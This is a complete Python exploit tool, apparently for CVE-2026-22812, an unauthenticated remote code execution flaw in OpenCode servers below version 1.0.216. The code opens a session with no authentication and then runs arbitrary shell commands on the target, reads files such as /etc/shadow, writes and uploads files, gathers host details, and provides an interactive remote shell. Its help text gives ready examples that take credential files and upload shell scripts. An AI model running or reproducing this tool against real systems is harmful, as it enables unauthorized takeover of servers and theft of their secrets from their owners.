#!/usr/bin/env python3 import requests import argparse import sys import json import os import readline from urllib.parse import urlparse from datetime import datetime from typing import Optional, Dict, Any import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class Colors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKCYAN = '\033[96m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' class OpenCodeExploit: def __init__(self, target: str, timeout: int = 10, proxy: str = None): self.target = target.rstrip('/') self.timeout = timeout self.session = requests.Session() self.session_id = None self.pty_id = None # Setup session self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36', 'Content-Type': 'application/json' }) # Setup proxy if provided if proxy: self.session.proxies = { 'http': proxy, 'https': proxy } # Statistics self.stats = { 'commands_executed': 0, 'files_read': 0, 'files_written': 0, 'errors': 0 } def log(self, message: str, level: str = "INFO"): """Print formatted log messages""" colors = { "INFO": Colors.OKBLUE, "SUCCESS": Colors.OKGREEN, "ERROR": Colors.FAIL, "WARNING": Colors.WARNING, "DEBUG": Colors.OKCYAN } prefixes = { "INFO": "[*]", "SUCCESS": "[+]", "ERROR": "[-]", "WARNING": "[!]", "DEBUG": "[.]" } color = colors.get(level, "") prefix = prefixes.get(level, "[?]") print(f"{color}{prefix} {message}{Colors.ENDC}") def verify_target(self) -> bool: try: self.log(f"Verifying target: {self.target}") # Try to create session session_id = self.create_session() if session_id: self.log("Target is VULNERABLE!", "SUCCESS") return True else: self.log("Target does not appear vulnerable", "ERROR") return False except Exception as e: self.log(f"Target verification failed: {str(e)}", "ERROR") return False def create_session(self) -> Optional[str]: try: url = f"{self.target}/session" self.log(f"Creating session...", "INFO") response = self.session.post( url, json={}, timeout=self.timeout, verify=False ) if response.status_code == 200: try: data = response.json() if 'id' in data: self.session_id = data['id'] self.log(f"Session created: {self.session_id}", "SUCCESS") return self.session_id except (json.JSONDecodeError, KeyError): pass return None except requests.exceptions.RequestException as e: self.log(f"Session creation failed: {str(e)}", "ERROR") self.stats['errors'] += 1 return None #Execute arbitrary shell command def execute_command(self, command: str, silent: bool = False) -> Optional[Dict]: if not self.session_id: if not self.create_session(): return None try: if not silent: self.log(f"Executing: {command}") url = f"{self.target}/session/{self.session_id}/shell" payload = { "agent": "build", "command": command } response = self.session.post( url, json=payload, timeout=self.timeout, verify=False ) self.stats['commands_executed'] += 1 if response.status_code in [200, 201, 202]: if not silent: self.log("Command executed successfully", "SUCCESS") try: return response.json() except json.JSONDecodeError: return {"output": response.text} else: if not silent: self.log(f"Command failed: HTTP {response.status_code}", "ERROR") self.stats['errors'] += 1 return None except requests.exceptions.RequestException as e: if not silent: self.log(f"Execution error: {str(e)}", "ERROR") self.stats['errors'] += 1 return None def create_pty(self) -> Optional[str]: try: self.log("Creating PTY session...") url = f"{self.target}/pty" response = self.session.post( url, json={}, timeout=self.timeout, verify=False ) if response.status_code in [200, 201]: try: data = response.json() if 'id' in data: self.pty_id = data['id'] self.log(f"PTY created: {self.pty_id}", "SUCCESS") return self.pty_id except: pass self.log("PTY created (no ID returned)", "SUCCESS") return "default" self.log(f"PTY creation failed: HTTP {response.status_code}", "ERROR") return None except requests.exceptions.RequestException as e: self.log(f"PTY error: {str(e)}", "ERROR") return None #Read arbitrary file from target def read_file(self, filepath: str) -> Optional[str]: try: self.log(f"Reading file: {filepath}") url = f"{self.target}/file/content" params = {"path": filepath} response = self.session.get( url, params=params, timeout=self.timeout, verify=False ) if response.status_code == 200: self.stats['files_read'] += 1 self.log(f"File read successfully ({len(response.text)} bytes)", "SUCCESS") return response.text else: self.log(f"File read failed: HTTP {response.status_code}", "ERROR") self.stats['errors'] += 1 return None except requests.exceptions.RequestException as e: self.log(f"File read error: {str(e)}", "ERROR") self.stats['errors'] += 1 return None #Write file to target system via command execution def write_file(self, filepath: str, content: str) -> bool: try: self.log(f"Writing file: {filepath}") import base64 encoded = base64.b64encode(content.encode()).decode() command = f"echo {encoded} | base64 -d > {filepath}" result = self.execute_command(command, silent=True) if result: verify_cmd = f"test -f {filepath} && echo 'OK'" verify = self.execute_command(verify_cmd, silent=True) if verify and 'OK' in str(verify): self.stats['files_written'] += 1 self.log(f"File written successfully", "SUCCESS") return True self.log("File write failed", "ERROR") return False except Exception as e: self.log(f"File write error: {str(e)}", "ERROR") return False #Upload local file to target def upload_file(self, local_path: str, remote_path: str) -> bool: try: if not os.path.exists(local_path): self.log(f"Local file not found: {local_path}", "ERROR") return False self.log(f"Uploading: {local_path} -> {remote_path}") with open(local_path, 'rb') as f: content = f.read() import base64 encoded = base64.b64encode(content).decode() if len(encoded) > 50000: self.log("Large file, uploading in chunks...") chunk_size = 50000 chunks = [encoded[i:i+chunk_size] for i in range(0, len(encoded), chunk_size)] self.execute_command(f"rm -f {remote_path}", silent=True) for i, chunk in enumerate(chunks): cmd = f"echo {chunk} >> {remote_path}.b64" if not self.execute_command(cmd, silent=True): self.log(f"Upload failed at chunk {i+1}", "ERROR") return False decode_cmd = f"base64 -d {remote_path}.b64 > {remote_path} && rm {remote_path}.b64" self.execute_command(decode_cmd, silent=True) else: command = f"echo {encoded} | base64 -d > {remote_path}" self.execute_command(command, silent=True) verify_cmd = f"ls -lh {remote_path}" result = self.execute_command(verify_cmd, silent=True) if result: self.log("Upload successful!", "SUCCESS") return True else: self.log("Upload verification failed", "ERROR") return False except Exception as e: self.log(f"Upload error: {str(e)}", "ERROR") return False #Download file from target def download_file(self, remote_path: str, local_path: str) -> bool: try: self.log(f"Downloading: {remote_path} -> {local_path}") content = self.read_file(remote_path) if content: with open(local_path, 'w') as f: f.write(content) self.log(f"Downloaded successfully ({len(content)} bytes)", "SUCCESS") return True else: self.log("Download failed", "ERROR") return False except Exception as e: self.log(f"Download error: {str(e)}", "ERROR") return False def get_system_info(self) -> Dict[str, str]: self.log("Gathering system information...") info = {} commands = { 'hostname': 'hostname', 'username': 'whoami', 'user_id': 'id', 'current_dir': 'pwd', 'kernel': 'uname -a', 'os_release': 'cat /etc/os-release 2>/dev/null | head -5', 'ip_address': 'ip addr show 2>/dev/null | grep inet | head -5', 'processes': 'ps aux | head -10' } for key, cmd in commands.items(): result = self.execute_command(cmd, silent=True) if result: info[key] = str(result).strip() return info #Interactive shell mode def interactive_shell(self): if not self.session_id: if not self.create_session(): return print(f"\n{Colors.OKGREEN}{Colors.BOLD}[*] Entering interactive shell mode{Colors.ENDC}") print(f"{Colors.WARNING}[!] Type 'help' for commands, 'exit' to quit{Colors.ENDC}\n") hostname_result = self.execute_command("hostname", silent=True) hostname = str(hostname_result).strip() if hostname_result else "target" username_result = self.execute_command("whoami", silent=True) username = str(username_result).strip() if username_result else "user" while True: try: prompt = f"{Colors.OKGREEN}{username}@{hostname}{Colors.ENDC}$ " cmd = input(prompt).strip() if not cmd: continue if cmd.lower() == 'exit': print(f"{Colors.WARNING}[*] Exiting...{Colors.ENDC}") break elif cmd.lower() == 'help': self.print_shell_help() continue elif cmd.startswith('read '): filepath = cmd[5:].strip() content = self.read_file(filepath) if content: print(content) continue elif cmd.startswith('download '): parts = cmd.split() if len(parts) >= 3: self.download_file(parts[1], parts[2]) else: print(f"{Colors.FAIL}[-] Usage: download {Colors.ENDC}") continue elif cmd.startswith('upload '): parts = cmd.split() if len(parts) >= 3: self.upload_file(parts[1], parts[2]) else: print(f"{Colors.FAIL}[-] Usage: upload {Colors.ENDC}") continue elif cmd == 'sysinfo': info = self.get_system_info() print(json.dumps(info, indent=2)) continue elif cmd == 'stats': self.print_statistics() continue elif cmd == 'session': print(f"Session ID: {self.session_id}") continue result = self.execute_command(cmd, silent=True) if result: output = result.get('output') or str(result) if output and output != '{}': print(output) except KeyboardInterrupt: print(f"\n{Colors.WARNING}[!] Interrupted. Type 'exit' to quit.{Colors.ENDC}") except EOFError: break except Exception as e: print(f"{Colors.FAIL}[-] Error: {str(e)}{Colors.ENDC}") def print_shell_help(self): help_text = f""" {Colors.BOLD}Interactive Shell Commands:{Colors.ENDC} {Colors.OKCYAN}Special Commands:{Colors.ENDC} help Show this help exit Exit interactive shell read Read file content download Download file upload Upload file sysinfo Gather system information stats Show exploitation statistics session Show current session ID {Colors.OKCYAN}Any other command:{Colors.ENDC} Will be executed as a shell command on the target {Colors.WARNING}Examples:{Colors.ENDC} ls -la cat /etc/passwd read /etc/shadow download /etc/hosts ./hosts.txt upload shell.sh /tmp/shell.sh """ print(help_text) def print_statistics(self): print(f"\n{Colors.BOLD}Exploitation Statistics:{Colors.ENDC}") print(f" Commands Executed: {self.stats['commands_executed']}") print(f" Files Read: {self.stats['files_read']}") print(f" Files Written: {self.stats['files_written']}") print(f" Errors: {self.stats['errors']}\n") def print_banner(): banner = f""" {Colors.FAIL}{Colors.BOLD} ╔════════════════════════════════════════════════════════════════╗ ║ ║ ║ CVE-2026-22812 Exploit Tool v1.0.0 ║ ║ OpenCode Unauthenticated RCE Exploitation ║ ║ ║ ║ Target: OpenCode < 1.0.216 ║ ║ CVSS Score: 8.8 (High) ║ ║ Type: Unauthenticated Remote Code Execution ║ ║ ║ ║ Author: @rohmatariow ║ ║ GitHub: github.com/rohmatariow/CVE-2026-22812-exploit ║ ║ ║ ╚════════════════════════════════════════════════════════════════╝ {Colors.ENDC} """ print(banner) def main(): print_banner() parser = argparse.ArgumentParser( description='CVE-2026-22812 Exploitation Tool', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=f""" {Colors.BOLD}Examples:{Colors.ENDC} # Interactive shell python3 exploit.py -t http://192.168.1.10:4096 -i # Execute single command python3 exploit.py -t http://192.168.1.10:4096 -c "id" # Read file python3 exploit.py -t http://192.168.1.10:4096 -r /etc/passwd # Upload file python3 exploit.py -t http://192.168.1.10:4096 --upload shell.sh /tmp/shell.sh # Download file python3 exploit.py -t http://192.168.1.10:4096 --download /etc/shadow ./shadow.txt # Gather system info python3 exploit.py -t http://192.168.1.10:4096 --sysinfo # Use with proxy (Burp) python3 exploit.py -t http://target:4096 -c "id" --proxy http://127.0.0.1:8080 """ ) parser.add_argument('-t', '--target', required=True, help='Target URL (e.g., http://192.168.1.10:4096)') action_group = parser.add_mutually_exclusive_group() action_group.add_argument('-c', '--command', help='Execute single command') action_group.add_argument('-r', '--read', help='Read file') action_group.add_argument('-i', '--interactive', action='store_true', help='Interactive shell mode') action_group.add_argument('--sysinfo', action='store_true', help='Gather system information') action_group.add_argument('--pty', action='store_true', help='Create PTY session') parser.add_argument('--upload', nargs=2, metavar=('LOCAL', 'REMOTE'), help='Upload file: --upload local.txt /tmp/remote.txt') parser.add_argument('--download', nargs=2, metavar=('REMOTE', 'LOCAL'), help='Download file: --download /etc/passwd ./passwd.txt') parser.add_argument('--timeout', type=int, default=10, help='Request timeout in seconds (default: 10)') parser.add_argument('--proxy', help='Proxy URL (e.g., http://127.0.0.1:8080)') parser.add_argument('--verify', action='store_true', help='Only verify if target is vulnerable') args = parser.parse_args() try: exploit = OpenCodeExploit( target=args.target, timeout=args.timeout, proxy=args.proxy ) if args.verify or not any([args.command, args.read, args.interactive, args.sysinfo, args.pty, args.upload, args.download]): if exploit.verify_target(): print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] Target is VULNERABLE to CVE-2026-22812!{Colors.ENDC}") print(f"{Colors.OKGREEN}[+] Session ID: {exploit.session_id}{Colors.ENDC}\n") sys.exit(0) else: print(f"\n{Colors.FAIL}[-] Target does not appear vulnerable{Colors.ENDC}\n") sys.exit(1) if not exploit.create_session(): print(f"\n{Colors.FAIL}[-] Failed to create session. Target may not be vulnerable.{Colors.ENDC}\n") sys.exit(1) print(f"\n{Colors.OKGREEN}[+] Target is VULNERABLE!{Colors.ENDC}") print(f"{Colors.OKGREEN}[+] Session ID: {exploit.session_id}{Colors.ENDC}\n") if args.interactive: exploit.interactive_shell() elif args.command: result = exploit.execute_command(args.command) if result: output = result.get('output') or json.dumps(result, indent=2) print(f"\n{output}\n") elif args.read: content = exploit.read_file(args.read) if content: print(f"\n{content}\n") elif args.sysinfo: info = exploit.get_system_info() print(f"\n{Colors.BOLD}System Information:{Colors.ENDC}") print(json.dumps(info, indent=2)) print() elif args.pty: pty_id = exploit.create_pty() if pty_id: print(f"\n{Colors.OKGREEN}[+] PTY Session ID: {pty_id}{Colors.ENDC}\n") elif args.upload: exploit.upload_file(args.upload[0], args.upload[1]) elif args.download: exploit.download_file(args.download[0], args.download[1]) if exploit.stats['commands_executed'] > 0 or exploit.stats['files_read'] > 0: exploit.print_statistics() except KeyboardInterrupt: print(f"\n{Colors.WARNING}[!] Interrupted by user{Colors.ENDC}\n") sys.exit(130) except Exception as e: print(f"\n{Colors.FAIL}[-] Fatal error: {str(e)}{Colors.ENDC}\n") sys.exit(1) if __name__ == "__main__": main()